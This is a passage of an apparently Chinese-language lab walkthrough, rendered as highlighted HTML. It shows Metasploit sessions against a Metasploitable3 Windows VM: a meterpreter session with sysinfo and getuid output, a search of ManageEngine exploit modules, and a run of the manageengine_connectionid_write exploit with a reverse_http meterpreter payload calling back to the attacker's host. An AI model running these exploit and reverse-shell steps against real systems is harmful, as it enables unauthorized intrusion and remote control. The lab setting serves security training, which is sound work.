class=\"hljs-string\">progress<\/span> <span class=\"hljs-bullet\">-<\/span> <span class=\"hljs-number\">100.00<\/span><span class=\"hljs-string\">%<\/span> <span class=\"hljs-string\">done<\/span> <span class=\"hljs-string\">(99626\/99626<\/span> <span class=\"hljs-string\">bytes)<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"20\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-string\">*<\/span>] <span class=\"hljs-string\">Sending<\/span> <span class=\"hljs-string\">stage<\/span> <span class=\"hljs-string\">(179779<\/span> <span class=\"hljs-string\">bytes)<\/span> <span class=\"hljs-string\">to<\/span> <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"21\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-string\">*<\/span>] <span class=\"hljs-string\">Meterpreter<\/span> <span class=\"hljs-string\">session<\/span> <span class=\"hljs-number\">2<\/span> <span class=\"hljs-string\">opened<\/span> <span class=\"hljs-string\">(192.168.177.143:4444<\/span> <span class=\"hljs-string\">-&gt;<\/span> <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span><span class=\"hljs-string\">:49555)<\/span> <span class=\"hljs-string\">at<\/span> <span class=\"hljs-number\">2019-04-26 17:32:58<\/span> <span class=\"hljs-string\">+0800<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"22\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"23\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">meterpreter<\/span> <span class=\"hljs-string\">&gt;<\/span> <span class=\"hljs-string\">sysinfo<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"24\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">Computer :<\/span> <span class=\"hljs-string\">METASPLOITABLE3<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"25\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">OS :<\/span> <span class=\"hljs-string\">Windows<\/span> <span class=\"hljs-number\">2008 <\/span><span class=\"hljs-string\">R2<\/span> <span class=\"hljs-string\">(Build<\/span> <span class=\"hljs-number\">7601<\/span><span class=\"hljs-string\">,<\/span> <span class=\"hljs-string\">Service<\/span> <span class=\"hljs-string\">Pack<\/span> <span class=\"hljs-number\">1<\/span><span class=\"hljs-string\">).<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"26\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">Architecture :<\/span> <span class=\"hljs-string\">x64<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"27\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">System Language :<\/span> <span class=\"hljs-string\">en_US<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"28\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">Domain :<\/span> <span class=\"hljs-string\">WORKGROUP<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"29\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">Logged On Users :<\/span> <span class=\"hljs-number\">2<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"30\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">Meterpreter :<\/span> <span class=\"hljs-string\">x86\/windows<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"31\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">meterpreter<\/span> <span class=\"hljs-string\">&gt;<\/span> <span class=\"hljs-string\">getuid<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"32\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">Server username:<\/span> <span class=\"hljs-string\">NT<\/span> <span class=\"hljs-string\">AUTHORITY\\LOCAL<\/span> <span class=\"hljs-string\">SERVICE<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"33\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">meterpreter<\/span> <span class=\"hljs-string\">&gt;<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"34\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"copy-code-btn\"><span class=\"hljs-string\">\u590d\u5236\u4ee3\u7801<\/span><\/span><\/div>\n<\/div>\n<\/li>\n<\/ol>\n<pre><code class=\"hljs linux copyable yaml\"><\/code><\/pre>\n<p>\u653b\u51fb<code>ManageEngine Desktop Central 9<\/code><\/p>\n<pre><code class=\"hljs linux copyable yaml\"><\/code><\/pre>\n<ol class=\"hljs-ln\">\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"1\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"2\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">msf5<\/span> <span class=\"hljs-string\">exploit(multi\/http\/jenkins_script_console)<\/span> <span class=\"hljs-string\">&gt;<\/span> <span class=\"hljs-string\">search<\/span> <span class=\"hljs-string\">type:exploit<\/span> <span class=\"hljs-string\">Manageengine<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"3\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"4\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">Matching<\/span> <span class=\"hljs-string\">Modules<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"5\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">================<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"6\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"7\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-comment\"># Name Disclosure Date Rank Check Description<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"8\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-bullet\">-<\/span> <span class=\"hljs-string\">----<\/span> <span class=\"hljs-string\">---------------<\/span> <span class=\"hljs-string\">----<\/span> <span class=\"hljs-string\">-----<\/span> <span class=\"hljs-string\">-----------<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"9\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-number\">1<\/span> <span class=\"hljs-string\">exploit\/multi\/http\/eventlog_file_upload<\/span> <span class=\"hljs-number\">2014-08-31 <\/span><span class=\"hljs-string\">excellent<\/span> <span class=\"hljs-literal\">Yes<\/span> <span class=\"hljs-string\">ManageEngine<\/span> <span class=\"hljs-string\">Eventlog<\/span> <span class=\"hljs-string\">Analyzer<\/span> <span class=\"hljs-string\">Arbitrary<\/span> <span class=\"hljs-string\">File<\/span> <span class=\"hljs-string\">Upload<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"10\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-number\">2<\/span> <span class=\"hljs-string\">exploit\/multi\/http\/manage_engine_dc_pmp_sqli<\/span> <span class=\"hljs-number\">2014-06-08 <\/span><span class=\"hljs-string\">excellent<\/span> <span class=\"hljs-literal\">Yes<\/span> <span class=\"hljs-string\">ManageEngine<\/span> <span class=\"hljs-string\">Desktop<\/span> <span class=\"hljs-string\">Central<\/span> <span class=\"hljs-string\">\/<\/span> <span class=\"hljs-string\">Password<\/span> <span class=\"hljs-string\">Manager<\/span> <span class=\"hljs-string\">LinkViewFetchServlet.dat<\/span> <span class=\"hljs-string\">SQL<\/span> <span class=\"hljs-string\">Injection<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"11\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-number\">3<\/span> <span class=\"hljs-string\">exploit\/multi\/http\/manageengine_auth_upload<\/span> <span class=\"hljs-number\">2014-12-15 <\/span><span class=\"hljs-string\">excellent<\/span> <span class=\"hljs-literal\">Yes<\/span> <span class=\"hljs-string\">ManageEngine<\/span> <span class=\"hljs-string\">Multiple<\/span> <span class=\"hljs-string\">Products<\/span> <span class=\"hljs-string\">Authenticated<\/span> <span class=\"hljs-string\">File<\/span> <span class=\"hljs-string\">Upload<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"12\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-number\">4<\/span> <span class=\"hljs-string\">exploit\/multi\/http\/manageengine_sd_uploader<\/span> <span class=\"hljs-number\">2015-08-20 <\/span><span class=\"hljs-string\">excellent<\/span> <span class=\"hljs-literal\">Yes<\/span> <span class=\"hljs-string\">ManageEngine<\/span> <span class=\"hljs-string\">ServiceDesk<\/span> <span class=\"hljs-string\">Plus<\/span> <span class=\"hljs-string\">Arbitrary<\/span> <span class=\"hljs-string\">File<\/span> <span class=\"hljs-string\">Upload<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"13\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-number\">5<\/span> <span class=\"hljs-string\">exploit\/multi\/http\/manageengine_search_sqli<\/span> <span class=\"hljs-number\">2012-10-18 <\/span><span class=\"hljs-string\">excellent<\/span> <span class=\"hljs-literal\">Yes<\/span> <span class=\"hljs-string\">ManageEngine<\/span> <span class=\"hljs-string\">Security<\/span> <span class=\"hljs-string\">Manager<\/span> <span class=\"hljs-string\">Plus<\/span> <span class=\"hljs-number\">5.5<\/span> <span class=\"hljs-string\">Build<\/span> <span class=\"hljs-number\">5505 <\/span><span class=\"hljs-string\">SQL<\/span> <span class=\"hljs-string\">Injection<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"14\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-number\">6<\/span> <span class=\"hljs-string\">exploit\/multi\/http\/opmanager_socialit_file_upload<\/span> <span class=\"hljs-number\">2014-09-27 <\/span><span class=\"hljs-string\">excellent<\/span> <span class=\"hljs-literal\">Yes<\/span> <span class=\"hljs-string\">ManageEngine<\/span> <span class=\"hljs-string\">OpManager<\/span> <span class=\"hljs-string\">and<\/span> <span class=\"hljs-string\">Social<\/span> <span class=\"hljs-string\">IT<\/span> <span class=\"hljs-string\">Arbitrary<\/span> <span class=\"hljs-string\">File<\/span> <span class=\"hljs-string\">Upload<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"15\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-number\">7<\/span> <span class=\"hljs-string\">exploit\/windows\/http\/desktopcentral_file_upload<\/span> <span class=\"hljs-number\">2013-11-11 <\/span><span class=\"hljs-string\">excellent<\/span> <span class=\"hljs-literal\">Yes<\/span> <span class=\"hljs-string\">ManageEngine<\/span> <span class=\"hljs-string\">Desktop<\/span> <span class=\"hljs-string\">Central<\/span> <span class=\"hljs-string\">AgentLogUpload<\/span> <span class=\"hljs-string\">Arbitrary<\/span> <span class=\"hljs-string\">File<\/span> <span class=\"hljs-string\">Upload<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"16\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-number\">8<\/span> <span class=\"hljs-string\">exploit\/windows\/http\/desktopcentral_statusupdate_upload<\/span> <span class=\"hljs-number\">2014-08-31 <\/span><span class=\"hljs-string\">excellent<\/span> <span class=\"hljs-literal\">Yes<\/span> <span class=\"hljs-string\">ManageEngine<\/span> <span class=\"hljs-string\">Desktop<\/span> <span class=\"hljs-string\">Central<\/span> <span class=\"hljs-string\">StatusUpdate<\/span> <span class=\"hljs-string\">Arbitrary<\/span> <span class=\"hljs-string\">File<\/span> <span class=\"hljs-string\">Upload<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"17\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-number\">9<\/span> <span class=\"hljs-string\">exploit\/windows\/http\/manage_engine_opmanager_rce<\/span> <span class=\"hljs-number\">2015-09-14 <\/span><span class=\"hljs-string\">manual<\/span> <span class=\"hljs-literal\">Yes<\/span> <span class=\"hljs-string\">ManageEngine<\/span> <span class=\"hljs-string\">OpManager<\/span> <span class=\"hljs-string\">Remote<\/span> <span class=\"hljs-string\">Code<\/span> <span class=\"hljs-string\">Execution<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"18\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-number\">10<\/span> <span class=\"hljs-string\">exploit\/windows\/http\/manageengine_adshacluster_rce<\/span> <span class=\"hljs-number\">2018-06-28 <\/span><span class=\"hljs-string\">excellent<\/span> <span class=\"hljs-literal\">Yes<\/span> <span class=\"hljs-string\">Manage<\/span> <span class=\"hljs-string\">Engine<\/span> <span class=\"hljs-string\">Exchange<\/span> <span class=\"hljs-string\">Reporter<\/span> <span class=\"hljs-string\">Plus<\/span> <span class=\"hljs-string\">Unauthenticated<\/span> <span class=\"hljs-string\">RCE<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"19\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-number\">11<\/span> <span class=\"hljs-string\">exploit\/windows\/http\/manageengine_appmanager_exec<\/span> <span class=\"hljs-number\">2018-03-07 <\/span><span class=\"hljs-string\">excellent<\/span> <span class=\"hljs-literal\">Yes<\/span> <span class=\"hljs-string\">ManageEngine<\/span> <span class=\"hljs-string\">Applications<\/span> <span class=\"hljs-string\">Manager<\/span> <span class=\"hljs-string\">Remote<\/span> <span class=\"hljs-string\">Code<\/span> <span class=\"hljs-string\">Execution<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"20\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-number\">12<\/span> <span class=\"hljs-string\">exploit\/windows\/http\/manageengine_apps_mngr<\/span> <span class=\"hljs-number\">2011-04-08 <\/span><span class=\"hljs-string\">average<\/span> <span class=\"hljs-literal\">No<\/span> <span class=\"hljs-string\">ManageEngine<\/span> <span class=\"hljs-string\">Applications<\/span> <span class=\"hljs-string\">Manager<\/span> <span class=\"hljs-string\">Authenticated<\/span> <span class=\"hljs-string\">Code<\/span> <span class=\"hljs-string\">Execution<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"21\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-number\">13<\/span> <span class=\"hljs-string\">exploit\/windows\/http\/manageengine_connectionid_write<\/span> <span class=\"hljs-number\">2015-12-14 <\/span><span class=\"hljs-string\">excellent<\/span> <span class=\"hljs-literal\">Yes<\/span> <span class=\"hljs-string\">ManageEngine<\/span> <span class=\"hljs-string\">Desktop<\/span> <span class=\"hljs-string\">Central<\/span> <span class=\"hljs-number\">9<\/span> <span class=\"hljs-string\">FileUploadServlet<\/span> <span class=\"hljs-string\">ConnectionId<\/span> <span class=\"hljs-string\">Vulnerability<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"22\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-number\">14<\/span> <span class=\"hljs-string\">exploit\/windows\/misc\/manageengine_eventlog_analyzer_rce<\/span> <span class=\"hljs-number\">2015-07-11 <\/span><span class=\"hljs-string\">manual<\/span> <span class=\"hljs-literal\">Yes<\/span> <span class=\"hljs-string\">ManageEngine<\/span> <span class=\"hljs-string\">EventLog<\/span> <span class=\"hljs-string\">Analyzer<\/span> <span class=\"hljs-string\">Remote<\/span> <span class=\"hljs-string\">Code<\/span> <span class=\"hljs-string\">Execution<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"23\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"24\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"25\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">msf5<\/span> <span class=\"hljs-string\">exploit(multi\/http\/jenkins_script_console)<\/span> <span class=\"hljs-string\">&gt;<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"26\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"copy-code-btn\"><span class=\"hljs-string\">\u590d\u5236\u4ee3\u7801<\/span><\/span><\/div>\n<\/div>\n<\/li>\n<\/ol>\n<pre><code class=\"hljs linux copyable yaml\"><\/code><\/pre>\n<pre><code class=\"hljs linux copyable yaml\"><\/code><\/pre>\n<ol class=\"hljs-ln\">\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"1\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">msf5<\/span> <span class=\"hljs-string\">exploit(multi\/http\/jenkins_script_console)<\/span> <span class=\"hljs-string\">&gt;<\/span> <span class=\"hljs-string\">use<\/span> <span class=\"hljs-string\">exploit\/windows\/http\/manageengine_connectionid_write<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"2\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">msf5<\/span> <span class=\"hljs-string\">exploit(windows\/http\/manageengine_connectionid_write)<\/span> <span class=\"hljs-string\">&gt;<\/span> <span class=\"hljs-string\">set<\/span> <span class=\"hljs-string\">PAYLOAD<\/span> <span class=\"hljs-string\">windows\/meterpreter\/reverse_http<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"3\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">PAYLOAD<\/span> <span class=\"hljs-string\">=&gt;<\/span> <span class=\"hljs-string\">windows\/meterpreter\/reverse_http<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"4\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">msf5<\/span> <span class=\"hljs-string\">exploit(windows\/http\/manageengine_connectionid_write)<\/span> <span class=\"hljs-string\">&gt;<\/span> <span class=\"hljs-string\">set<\/span> <span class=\"hljs-string\">LHOST<\/span> <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.143<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"5\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">LHOST<\/span> <span class=\"hljs-string\">=&gt;<\/span> <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.143<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"6\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">msf5<\/span> <span class=\"hljs-string\">exploit(windows\/http\/manageengine_connectionid_write)<\/span> <span class=\"hljs-string\">&gt;<\/span> <span class=\"hljs-string\">exploit<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"7\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"8\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-string\">-<\/span>] <span class=\"hljs-attr\">Exploit failed: The following options failed to validate:<\/span> <span class=\"hljs-string\">RHOSTS.<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"9\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-string\">*<\/span>] <span class=\"hljs-string\">Exploit<\/span> <span class=\"hljs-string\">completed,<\/span> <span class=\"hljs-string\">but<\/span> <span class=\"hljs-literal\">no<\/span> <span class=\"hljs-string\">session<\/span> <span class=\"hljs-string\">was<\/span> <span class=\"hljs-string\">created.<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"10\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">msf5<\/span> <span class=\"hljs-string\">exploit(windows\/http\/manageengine_connectionid_write)<\/span> <span class=\"hljs-string\">&gt;<\/span> <span class=\"hljs-string\">set<\/span> <span class=\"hljs-string\">RHOSTS<\/span> <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"11\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">RHOSTS<\/span> <span class=\"hljs-string\">=&gt;<\/span> <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"12\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">msf5<\/span> <span class=\"hljs-string\">exploit(windows\/http\/manageengine_connectionid_write)<\/span> <span class=\"hljs-string\">&gt;<\/span> <span class=\"hljs-string\">exploit<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"13\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"14\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-string\">*<\/span>] <span class=\"hljs-string\">Started<\/span> <span class=\"hljs-string\">HTTP<\/span> <span class=\"hljs-string\">reverse<\/span> <span class=\"hljs-string\">handler<\/span> <span class=\"hljs-string\">on<\/span> <span class=\"hljs-string\">http:\/\/192.168.177.143:8080<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"15\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-string\">*<\/span>] <span class=\"hljs-string\">Creating<\/span> <span class=\"hljs-string\">JSP<\/span> <span class=\"hljs-string\">stager<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"16\"><\/div>\n<\/div>\n<div 